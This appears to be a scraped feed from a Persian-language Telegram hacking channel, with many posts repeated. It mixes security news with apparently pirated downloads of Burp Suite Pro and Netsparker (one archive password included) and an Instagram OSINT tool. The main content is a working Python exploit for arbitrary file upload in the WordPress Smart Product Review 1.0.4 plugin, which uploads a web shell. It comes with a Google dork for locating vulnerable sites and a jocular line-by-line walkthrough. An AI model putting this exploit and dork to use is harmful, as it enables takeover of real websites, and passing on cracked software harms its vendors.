This media is not supported in your browser
VIEW IN TELEGRAM
فیسبوک به Meta تغییر نام داد .
همونطور که زاکربرگ گفته بود نام این شرکت سر انجام به متا ( meta ) تغییر پیدا کرد و به گفته خودش دنبال چیزی فراتر از شبکه های اجتماعی است .
——————
0Day.Today
@LearnExploit
@Tech_Army
همونطور که زاکربرگ گفته بود نام این شرکت سر انجام به متا ( meta ) تغییر پیدا کرد و به گفته خودش دنبال چیزی فراتر از شبکه های اجتماعی است .
——————
0Day.Today
@LearnExploit
@Tech_Army
burp_suite_pro_v2021.10.zip
497.8 MB
Burp Suite Version 2021.10
آموزش استفاده در فایل Readme گفته شده .
* نکته : برای اجرا شدن نیاز به Java runtime ورژن 9 به بالا و Java JDK نیاز خواهید داشت . *
pass: 311138
#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش استفاده در فایل Readme گفته شده .
* نکته : برای اجرا شدن نیاز به Java runtime ورژن 9 به بالا و Java JDK نیاز خواهید داشت . *
pass: 311138
#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
بکدور هاردکد شده ی جدید در محصولات سیسکو به هکرها اجازه میدهد بصورت ریموت دسترسی روت بدست آورند!
این بکدور یک کلید ssh است که در زمان تولید محصول بر روی آن قرار داده شده.
https://thehackernews.com/2021/11/hardcoded-ssh-key-in-cisco-policy-suite.html
منبع : #امنیت_اطلاعات
——————
0Day.Today
@LearnExploit
@Tech_Army
این بکدور یک کلید ssh است که در زمان تولید محصول بر روی آن قرار داده شده.
https://thehackernews.com/2021/11/hardcoded-ssh-key-in-cisco-policy-suite.html
منبع : #امنیت_اطلاعات
——————
0Day.Today
@LearnExploit
@Tech_Army
جمع آوری اطلاعات از اینستاگرام با ابزار اوسینت Osintgram در کالی لینوکس
Github
#information_gathering #osint #instagram #kali #linux #tools
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#information_gathering #osint #instagram #kali #linux #tools
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
Osintgram.rar
17.4 MB
#information_gathering #osint #instagram #kali #linux #tools
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
Netsparker-Standard-6.2.0.33156.7z
198.8 MB
Netsparker Standard 6.2.0.33156
نسخه قبلی قدیمی شده بود به درخواست یکی از بچه ها قرار گرفت .
#netsparker #scanner
——————
0Day.Today
@LearnExploit
@Tech_Army
نسخه قبلی قدیمی شده بود به درخواست یکی از بچه ها قرار گرفت .
#netsparker #scanner
——————
0Day.Today
@LearnExploit
@Tech_Army
burpsuite_pro_v2021.10.1.7z
619.8 MB
Burp Suite Version 2021.10.1
آموزش استفاده در فایل Readme گفته شده .
* نکته : برای اجرا شدن نیاز به Java runtime ورژن 9 به بالا و Java JDK نیاز خواهید داشت . *
#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش استفاده در فایل Readme گفته شده .
* نکته : برای اجرا شدن نیاز به Java runtime ورژن 9 به بالا و Java JDK نیاز خواهید داشت . *
#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش نصب و ستاپ سرتیفیکت Burp Suite در گوگل کروم
#burpsuite #certificate
AT7
——————
0Day.Today
@LearnExploit
@Tech_Army
#burpsuite #certificate
AT7
——————
0Day.Today
@LearnExploit
@Tech_Army
👍1
❗️امروز گروه هکری بنام ( هوشیاران وطن ) اعلام کرد که به سایت و ایمیل های شرکت هواپیمایی ماهان حمله سایبری کرده است .
همچنین مسافران پیامک هشدار و اعلام هک از این گروه را دریافت کردند . این پیامک به اعضای باشگاه مشتریان و خریداران بلیت های این شرکت هواپیمایی ارسال شده است .
پس از اطلاعیه این گروه مبنی بر هک اطلاعات شرکت هواپیمایی ماهان مدیر روابط عمومی این شرکت وقوع این حمله سایبری را تایید کرد و گفت که این حمله مهار شده است .
این تیم از هک شرکت هواپیمایی ماهان و به دست آوردن اطلاعات حساس درباره همکاری نزدیک با نیروی قدس سپاه خبر داد و بخشی از اطلاعات را منتشر کرد که میگوند از این هک به دست اومده .
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
همچنین مسافران پیامک هشدار و اعلام هک از این گروه را دریافت کردند . این پیامک به اعضای باشگاه مشتریان و خریداران بلیت های این شرکت هواپیمایی ارسال شده است .
پس از اطلاعیه این گروه مبنی بر هک اطلاعات شرکت هواپیمایی ماهان مدیر روابط عمومی این شرکت وقوع این حمله سایبری را تایید کرد و گفت که این حمله مهار شده است .
این تیم از هک شرکت هواپیمایی ماهان و به دست آوردن اطلاعات حساس درباره همکاری نزدیک با نیروی قدس سپاه خبر داد و بخشی از اطلاعات را منتشر کرد که میگوند از این هک به دست اومده .
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
infoSec Black Friday - All the deals for infoSec related software/tools this Black Friday
Github
#Black_Friday
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#Black_Friday
——————
0Day.Today
@LearnExploit
@Tech_Army
#WP #vulnerabilities #Vuln #File_Upload #Wordpress
➖➖➖➖➖➖➖➖➖➖➖➖
✅آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.4
جهت مشاهده ی دمو بزنید.
دورک و تحلیل اسکریپت تو پست بعدی
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army
➖➖➖➖➖➖➖➖➖➖➖➖
✅آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.4
جهت مشاهده ی دمو بزنید.
دورک و تحلیل اسکریپت تو پست بعدی
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army
#WP #vulnerabilities #Vuln #File_Upload #Wordpress
➖➖➖➖➖➖➖➖➖➖➖➖
✅آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.
#Google~Dork:
#Download~Script:
Download
خب بریم ببینیم این اسکریپت چطوری کار میکنه :
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅خب داره اینجا لایبرری ها رواضافه میکنه
import os.path
from os import path
import json
import requests
import time
import sys
➖➖➖➖➖➖➖➖➖➖➖➖➖
✅ نمایشی از خودش را انداخته اینجا :|
def banner():
animation = "|/-\\"
for i in range(20):
time.sleep(0.1)
sys.stdout.write("\r" + animation[i % len(animation)])
sys.stdout.flush()
#do something
print("Smart Product Review 1.0.4 - Arbitrary File Upload")
print("Republice By : IR0Day.Today Channel")
def usage():
print("Usage: python3 exploit.py [target url] [your shell]")
print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅خب اینجا داره فانکشینی مبنی بر چک کردن باگ تعریف میکنه
def vuln_check(uri):
response = requests.get(uri)
raw = response.text
if ("No script kiddies please!!" in raw):
return False;
else:
return True;
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅انجام امورات مهم :) اینجا صورت گرفته :
def main():
banner() # Banner ejra mishe
if(len(sys.argv) != 3): #Age toole vurudi kamtar az 3 ta bood
usage(); # ino nemayesh bede
sys.exit(1); # badesh kharej sho
base = sys.argv[1] #argoman 1 ke hamoon targete mesal : google.com
file_path = sys.argv[2] #argoman dovom (inm shelletone )
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅بعضی چیزارو واسه راحتی کار ریخته توی متغیر
ajax_action = 'sprw_file_upload_action'
admin = '/wp-admin/admin-ajax.php';
uri = base + admin + '?action=' + ajax_action ; #inja beham chasbunde
check = vuln_check(uri); # khob inja Chizaei ke chasbondaroo mifrestee be function check
➖➖➖➖➖➖➖➖➖➖➖➖➖
✅بعده چک شدن حالا اگه False بود میزنه اسیب پذیر نیست و خارج میشه ولی اگه اسیب پذیر بود میزنن اسیب پذیره و خارج میشه 😐
if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)
if( path.isfile(file_path) == False):
print("(*) Invalid file!")
sys.exit(1)
➖➖➖➖➖➖➖➖➖➖➖➖➖
✅اینجا یه دیکشنری تعریف میکنه که تو متد request لازمه ( البته از نوع پست )
files = {'files[]' : open(file_path)}
data = {
"allowedExtensions[0]" : "jpg",
"allowedExtensions[1]" : "php4",
"allowedExtensions[2]" : "phtml",
"allowedExtensions[3]" : "png",
"qqfile" : "files",
"element_id" : "6837",
"sizeLimit" : "12000000",
"file_uploader_nonce" : "2b102311b7"
}
print("Uploading Shell...");
response = requests.post(uri, files=files, data=data )
✅تو خط بالایی داره دیتا هارو میفرسته
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅بعده ارسال query چک میکنه که فایل شله هست اونجا یا نه اگه بود میزنه حله دهنشو سرویس کن نبود میگه بعدی... و خارج میشه
file_name = path.basename(file_path)
if("ok" in response.text):
print("Shell Uploaded!")
print("Shell URL on your Review/Comment");
else:
print("Shell Upload Failed")
sys.exit(1)
main();
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅خب این بود کل قضیه 😐🙌 بابا خیلی جدی نگیرید اینارو
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@TechArmy
➖➖➖➖➖➖➖➖➖➖➖➖
✅آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.
#Google~Dork:
inurl: /wp-content/plugins/smart-product-review/
#Download~Script:
Download
خب بریم ببینیم این اسکریپت چطوری کار میکنه :
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅خب داره اینجا لایبرری ها رواضافه میکنه
import os.path
from os import path
import json
import requests
import time
import sys
➖➖➖➖➖➖➖➖➖➖➖➖➖
✅ نمایشی از خودش را انداخته اینجا :|
def banner():
animation = "|/-\\"
for i in range(20):
time.sleep(0.1)
sys.stdout.write("\r" + animation[i % len(animation)])
sys.stdout.flush()
#do something
print("Smart Product Review 1.0.4 - Arbitrary File Upload")
print("Republice By : IR0Day.Today Channel")
def usage():
print("Usage: python3 exploit.py [target url] [your shell]")
print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅خب اینجا داره فانکشینی مبنی بر چک کردن باگ تعریف میکنه
def vuln_check(uri):
response = requests.get(uri)
raw = response.text
if ("No script kiddies please!!" in raw):
return False;
else:
return True;
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅انجام امورات مهم :) اینجا صورت گرفته :
def main():
banner() # Banner ejra mishe
if(len(sys.argv) != 3): #Age toole vurudi kamtar az 3 ta bood
usage(); # ino nemayesh bede
sys.exit(1); # badesh kharej sho
base = sys.argv[1] #argoman 1 ke hamoon targete mesal : google.com
file_path = sys.argv[2] #argoman dovom (inm shelletone )
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅بعضی چیزارو واسه راحتی کار ریخته توی متغیر
ajax_action = 'sprw_file_upload_action'
admin = '/wp-admin/admin-ajax.php';
uri = base + admin + '?action=' + ajax_action ; #inja beham chasbunde
check = vuln_check(uri); # khob inja Chizaei ke chasbondaroo mifrestee be function check
➖➖➖➖➖➖➖➖➖➖➖➖➖
✅بعده چک شدن حالا اگه False بود میزنه اسیب پذیر نیست و خارج میشه ولی اگه اسیب پذیر بود میزنن اسیب پذیره و خارج میشه 😐
if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)
if( path.isfile(file_path) == False):
print("(*) Invalid file!")
sys.exit(1)
➖➖➖➖➖➖➖➖➖➖➖➖➖
✅اینجا یه دیکشنری تعریف میکنه که تو متد request لازمه ( البته از نوع پست )
files = {'files[]' : open(file_path)}
data = {
"allowedExtensions[0]" : "jpg",
"allowedExtensions[1]" : "php4",
"allowedExtensions[2]" : "phtml",
"allowedExtensions[3]" : "png",
"qqfile" : "files",
"element_id" : "6837",
"sizeLimit" : "12000000",
"file_uploader_nonce" : "2b102311b7"
}
print("Uploading Shell...");
response = requests.post(uri, files=files, data=data )
✅تو خط بالایی داره دیتا هارو میفرسته
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅بعده ارسال query چک میکنه که فایل شله هست اونجا یا نه اگه بود میزنه حله دهنشو سرویس کن نبود میگه بعدی... و خارج میشه
file_name = path.basename(file_path)
if("ok" in response.text):
print("Shell Uploaded!")
print("Shell URL on your Review/Comment");
else:
print("Shell Upload Failed")
sys.exit(1)
main();
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅خب این بود کل قضیه 😐🙌 بابا خیلی جدی نگیرید اینارو
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@TechArmy
Telegram
AttachLearnExploit
👍2